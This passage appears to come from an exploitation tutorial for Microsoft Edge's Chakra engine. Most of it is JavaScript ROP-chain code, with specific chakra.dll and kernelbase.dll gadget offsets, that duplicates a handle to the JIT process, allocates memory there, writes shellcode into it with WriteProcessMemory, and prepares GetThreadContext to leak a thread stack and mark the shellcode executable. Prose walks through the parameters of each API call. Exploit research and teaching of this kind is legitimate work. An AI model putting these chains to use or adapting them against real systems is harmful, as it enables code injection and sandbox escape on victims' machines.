write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

This call is pretty straight forward, and since there are only four parameters we don’t have to write any parameters to the stack.

We start out with the flProtect parameter (again we have to make sure RAX is writable because of a gadget when performs cmp r8d, [rax]). We can set a breakpoint on jmp rax, as we have seen, to reach our first gadget within the VirtualAlloc ROP chain.

The first parameter we are going to start with flProtect parameter, which we will set to 4, or PAGE_READWRITE.

Our call to VirtualAlloc is now in this state:

VirtualAlloc(
	-
	-
	-
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

The next parameter we will address is lpAddress - which we will set to NULL.

This brings our call to the following state:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	-
	-
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

Next up is our dwSize parameter. We showed earlier how to calculate the size of a CONTEXT structure, and so we will use a value of 0x4d0.

This brings us to the following state - with only one more parameter to deal with:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	-
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

The last parameter we need to set is flAllocationType, which will be a value of 0x3000.

This completes our parameters:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	MEM_COMMIT | MEM_RESERVE,	// Make sure this memory is committed and reserved
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

Lastly, we execute our function call and the return value should be to a block of memory which we will use in our call to GetThreadContext.

As part of our next ROP chain, calling GetThreadContext, we will preserve this address as we need to write a value into it before we make our call to GetThreadContext.

GetThreadContext ROP Chain

As mentioned earlier, we want to inject one last item into the JIT process, now that our shellcode is there, and that is a final ROP chain that will mark our shellcode as RWX. As we know, with ROP, we need to have stack control in order to have ROP work, as each gadget performs a return to the stack, and we need to control what each gadget returns back into (our next ROP gadget). So, since we have already controlled a thread (by creating one) in the remote JIT process, we can use the Windows API GetThreadContext to dump the CPU register state of our thread, which includes the RSP register, or the stack pointer. In other words, GetThreadContext allows us, by nature, to leak the stack from a thread in any process which a user has access to via a handle to a thread within said process. Luckily for us, as mentioned, CreateRemoteThread returned a handle to us - meaning we have a handle to a thread within the JIT process that we control.

However, let’s quickly look at GetThreadContext and its documentation, specifically the lpContext parameter:

A pointer to a CONTEXT structure (such as ARM64_NT_CONTEXT) that receives the appropriate context of the specified thread. The value of the ContextFlags member of this structure specifies which portions of a thread’s context are retrieved. The CONTEXT structure is highly processor specific. Refer to the WinNT.h header file for processor-specific definitions of this structures and any alignment requirements.

As we can see, it is a slight misnomer to say that we only need to supply GetThreadContext with an empty buffer to fill. When calling GetThreadContext, one needs to fill in CONTEXT.ContextFlags in order to tell the OS how much of the thread’s context (e.g. CPU register state) we would like to receive. In our case, we want to retrieve all of the registers back (a full 0x4d0 CONTEXT structure).

Taking a look at ReactOS we can see the possible values we can supply here:

If we add all of these values together to retrieve CONTEXT_ALL, we can see we get a value of 0x10001f. This means that when we call GetThreadContext, before the call, we need to set our CONTEXT structure (which is really our VirtualAlloc allocation address) to 0x10001f in the ContextFlags structure.

Looking at WinDbg, this value is located at CONTEXT + 0x30.

This means that before we call GetThreadContext, we need to write to our buffer, which we allocated with VirtualAlloc (we will pass this into GetThreadContext to act as our “CONTEXT” structure), the value 0x10001f at an offset of 0x30 within this buffer. Here is how this looks:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)			// The buffer to receive the CONTEXT structure
);

Let’s see how all of this looks via ROP (with previous chains for continuity):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
